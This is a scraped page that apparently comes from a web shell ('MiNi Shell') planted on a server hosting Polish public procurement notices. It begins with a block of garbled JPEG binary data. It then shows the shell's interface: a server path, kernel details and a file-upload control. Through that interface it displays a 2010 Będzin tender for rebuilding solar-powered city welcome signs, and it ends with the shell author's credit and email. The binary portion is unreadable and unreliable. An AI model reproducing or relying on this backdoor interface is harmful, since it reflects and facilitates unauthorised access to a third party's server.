JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100723/221994-N-2010.html

<p class="kh_header"><b>Będzin: Remont kapitalny witaczy</b><br>
<b>Numer ogłoszenia: 221994 - 2010; data zamieszczenia: 23.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Będzina , ul. 11 Listopada 20, 42-500 Będzin, woj. śląskie, tel. 032 267-35-16, faks (032) 267 62 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bedzin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont kapitalny witaczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje remont kapitalny konstrukcji witaczy zlokalizowanych przy trasie DK 86.
 Zakres prac obejmuje:
1.	demontaż starych podkonstrukcji dwóch witaczy (1 od strony Katowic i 1 od strony Warszawy), na których umieszczony jest napis BĘDZIN, zezłomowanie konstrukcji i na podstawie kwitów wagowych i karty przekazania odpadu ze składnicy złomu rozliczenie (wpłacenie na rachunek dochodów gminy) równowartości pieniężnej uzyskanej ze sprzedaży złomu.
2.	odnowienie konstrukcji słupów dwóch witaczy o wysokości 13m i średnicy 0,178m wraz z elementem mocującym do podkonstrukcji aluminiowej: czyszczenie całej konstrukcji słupów wraz z malowaniem farbą akrylową, na kolor RAL 9003 (biały)
3.	wykonanie dwóch nowych podkonstrukcji aluminiowych z profilu aluminiowego 40x40x2 mm pokrytych blachą aluminiową 1 mm spełniające normy: EN 485-1,3; EN 573-3 o wymiarach 1,5m x 5m.
Całość podkonstrukcji malowana proszkowo farbą poliestrową, grubość warstwy 60-80 mikrona na kolor RAL 9003 (biały). Podkonstrukcje muszą zostać umieszczone na słupach w taki sposób, pod takim kątem żeby napis witaczy był dobrze widoczny od strony wlotu drogi, przy której stoi. 
4.	zamontowanie monokrystalicznych baterii słonecznych na szczycie konstrukcji słupów i zasilenie napisów
5.	umieszczenie za podkonstrukcją aluminiową z napisem, obudowy akumulatorów do zasilania oświetlenia witaczy, estetyczne zabudowanie akumulatorów zabezpieczające przed wpływem warunków atmosferycznych oraz umożliwiające dostęp w przypadku konieczności usunięcia awarii
6.	wykonanie napisu na podkonstrukcji aluminiowej zgodnego z załączoną wizualizacją wg poniższego opisu, krój liter napisu Arial Black:
a) napis BĘDZIN 
Wysokość  liter zgodnie z projektem załącznik nr 7 do SIWZ, wykonany w formie przestrzennej o grubości 110 mm z blachy aluminiowej o grubości 1mm, spełniającej normy europejskie EN 485-1,3; EN 573-3 malowanej proszkowo farbą poliestrową, grubość warstwy 60-80 1mikrona na kolor RAL 9003 (biały).
Lico litery wykonane z pleksi 3 mm kolor mleczny wyklejany folia w kolorze RAL 5022. 
Podświetlanie
Diody: model SLED-1-WHITE spełniające Dyrektywę Niskonapięciową LVD 2006/95/WE z dnia 12 grudnia 2006
-pod napisem Będzin czerwona linia wysokość 7 cm wykonany w formie przestrzennej o grubości 110 mm z blachy aluminiowej o grubości 1mm, spełniającej normy europejskie EN 485-1,3; EN 573-3 malowanej proszkowo farbą poliestrową, grubość warstwy 60-80 1mikrona na kolor RAL 9003 (biały).
Lico linii wykonane z pleksi 3 mm kolor czerwony RAL 3020. 
Podświetlanie
Diody: model SLED-1-RED spełniające Dyrektywę Niskonapięciową LVD 200695WE z dnia 12 grudnia 2006
b) Znak graficzny Miasta Będzina:
Wykonany z pleksi z grafiką w formie wyklejki, w formie przestrzennej o grubości 110 mm z blachy aluminiowej o grubości 1mm, spełniającej normy europejskie: EN 485-1,3; EN 573-3 malowanej proszkowo farbą poliestrową, grubość warstwy 60-80 1mikrona na kolor RAL 9003 (biały).
Lico litery wykonane z pleksi 3 mm kolor mleczny biały wyklejany folią w kolorze RAL 5022. 
Podświetlanie
Diody: model SLED-1-WHITE spełniające Dyrektywę Niskonapięciową LVD 2006/95/WE z dnia 12 grudnia 2006
d) Zasilanie:
Monokrystaliczna bateria słoneczna 160W - 4szt.
- Prąd ładowania: 8.6A
- Prąd zwarciowy: 9.4A
- Wymiary: 1580x 810x 50 [mm]
- Waga: 14.5kg
- Napięcie nominalne: 17V
- Napięcie jałowe: 21V
 Regulator ładowania CX40
-Zastosowanie w systemach 12V24V
-Natężenie prądu fotomodułów do 40A
-Regulacja poziomów odcięcia  powrotu dla LVD 
-Automatyczne włączanie wyłączanie obciążenia
-Temperatura pracy od -40 do +50 C
- Wbudowany czujnik temperatury
Akumulator deep cycle AGM 44Ah - 4szt.
-Całkowicie bez obsługowe, bez potrzeby uzupełniania wody
- Zwiększona trwałość i żywotność, przy pracy buforowej i cyklach głębokiego rozładowania
- Konstrukcja szczelna
- Może pracować w położeniu pionowym i poziomym
- Niskie samo rozładowanie
- Bezpieczne w transporcie
- Wymiary: dł. 197mm, szer. 165mm, wys. 170mm
- Waga: 13.6g
Uwagi:
1.	Demontaż starych podkonstrukcji witaczy wraz z napisem musi być wykonany w terminie 7 dni od dnia przekazania frontu robót.
2.	Zamawiający wymaga od Wykonawcy dostarczenia oraz montażu witaczy z gwarancją otrzymania sprawności świecenia w minimalnym zakresie 110 kandelimetr2 [ Cdm2] mierzonej w nocy.
3.	Warunek: po zakończeniu prac związanych z modernizacją witaczy Zamawiający wymaga przeprowadzenia testu jasności świecenia CHROMA METER Konika Minolta CS-100A potwierdzającego moc świecenia wymaganą przez Zamawiającego.
4.	Pracownicy Wykonawcy wykonujący prace muszą używać kamizelek z elementami odblaskowymi w kolorze żółtym lub pomarańczowym z zamieszczonym logo firmy.
5.	Wykonawca jest zobowiązany do zabezpieczenia terenu podczas wykonywania prac, o ile będzie to wymagane obowiązującymi przepisami prawa.
6.	Wykonawca dostarczy Zamawiającemu dokumenty potwierdzające wpłacenie należności za zezłomowane elementy na rachunek dochodów gminy, tytułem: wpływ ze złomu, oraz kopie kwitów wagowych i kart przekazania odpadów ze składnicy złomu. Dokumenty te należy dołączyć do faktury rozliczeniowej wykonanych prac wraz z protokołem odbioru robót.
7.	Zamawiający wymaga udzielenia gwarancji na elementy :
5 lat- Diody LED
5 lat- Konstrukcja
26 lat- na wydajność systemu zasilania
24 miesiące- na lico z pleksi.
8.	W ofercie należy podać cenę ryczałtową wykonania zadania w oparciu o opis przedmiotu zamówienia oraz o przedmiar robót. Oferent wliczy w cenę oferty wszelkie koszty związane z realizacją zamówienia, w tym także koszty związane z zajęciem pasa drogi DK 86 na czas prowadzenia robót.
9.	Wynagrodzenie za zakres rzeczowy robót określony, zgodnie z przedmiarem robót płatne jednorazowo po dokonaniu bezusterkowego odbioru końcowego potwierdzonego protokołem. Do rozliczenia Wykonawca przedstawi dokumenty potwierdzające zgodne z przepisami postępowanie z odpadami powstałymi w trakcie realizacji prac (zezłomowanie elementów stalowych konstrukcji witaczy, wpłata na rachunek dochodów Urzędu itd.).
   
Szczegółowy zakres robót określony jest poprzez specyfikacje techniczne załącznik nr 8 do SIWZ, projekt  załącznik nr 7 do SIWZ i przedmiary robót stanowiące załącznik nr 6  do SIWZ.
     Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały i urządzenia. Złożone wyżej wskazane dokumenty będą podlegały ocenie przez autora dokumentacji projektowej, który sporządzi stosowną opinię. Opinia ta będzie podstawą do podjęcia przez Zamawiającego decyzji o odrzuceniu oferty z powodu nierównoważności zaproponowanych zamienników. 
Przy wykonywaniu robót należy stosować wyroby dopuszczone do obrotu i stosowania w budownictwie zgodnie z ustawą z dnia 07 lipca 1994r. z ( Dz. U. nr 89 poz. 414 z 1994r. z późniejszymi zmianami).
Utrzymanie czystości i porządku oraz gospodarkę odpadami należy prowadzić zgodnie z ustawą z dnia 13 września1996 r. o utrzymaniu czystości i porządku w gminach (tj.z 2005r. Dz.U. Nr 236, poz.2008 ze zm.) oraz ustawą z dnia 27 kwietnia 2001 r. o odpadach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.31.10-0, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się wykazania robót budowlanych wykonanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Wymaga się wykazania co najmniej jednej roboty w realizacji reklam wolnostojących w wysokości powyżej 3m. 
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach złożonych przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się wykazania osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją
o podstawie do dysponowania tymi osobami tj.: minimum 1 osobę:
-  posiadającą niezbędne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej  lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na  podstawie wcześniej obowiązujących  przepisów.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach złożonych przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp  .
2.Wypełniony czytelnie, podpisany  przez Wykonawcę formularz ofertowy 
UWAGA !  Na formularzu ofertowym należy ujawnić wszystkie podmioty składające ofertę wspólną z zaznaczeniem np. konsorcjum. 
3. Pełnomocnictwo w sytuacjach, w których uprawnienie do podpisania oferty nie wynika z
zapisu we właściwym rejestrze lub ewidencji, w tym wynikające z art. 23  ust.2ustawy Pzp.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W przypadkach niżej przewidzianych dopuszcza się wprowadzenie zmian umowy za zgodą zamawiającego.
2.Zmiany te  mogą być inicjowane przez zamawiającego lub przez wykonawcę.
3.Zmiany umowy nie mogą wykraczać poza zakres świadczenia określony w siwz.
4.Zmiany, o których mowa w pkt. 4, mogą zostać dokonane, jeżeli ich uzasadnieniem są niżej 
5. Zmiana terminu realizacji zamówienia może nastąpić w przypadku opóźnień wynikających z:
-przestojów i opóźnień zawinionych przez Zamawiającego,
-działania siły wyższej ( np. klęski żywiołowe, strajki generalne lub lokalne, zjawiska gospodarcze lub pogodowe) w pełni niezależnej od Stron umowy, mającej bezpośredni wpływ na termin wykonania robót,
-przeszkód technicznych w pełni niezależnych od Stron umowy, mających bezpośredni wpływ na termin wykonania robót,
-wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót- fakt ten musi mieć odzwierciedlenie w dzienniku budowy i musi być potwierdzony przez inspektora nadzoru,
-wystąpienia okoliczności, których Strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności, 
6.Zmiana osób uczestniczących w realizacji zamówienia może nastąpić w przypadku:
-utraty uprawnień,
-śmierci, długotrwałej  choroby lub nieobecności lub innych zdarzeń losowych,
-ustanie stosunku prawnego łączącego Wykonawcę z ww. osobami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bedzin.bip.info.pl/index.php?idmp=30&r=r<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Będzinie
Biuro Zamówień Publicznych pok.117        
 42-500 Będzin ul. 11 Listopada 20
tel.fax.32 2679134.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.08.2010 godzina 09:00, miejsce: Urząd Miejski w Będzinie
Biuro Zamówień Publicznych pok.117        
 42-500 Będzin ul. 11 Listopada 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com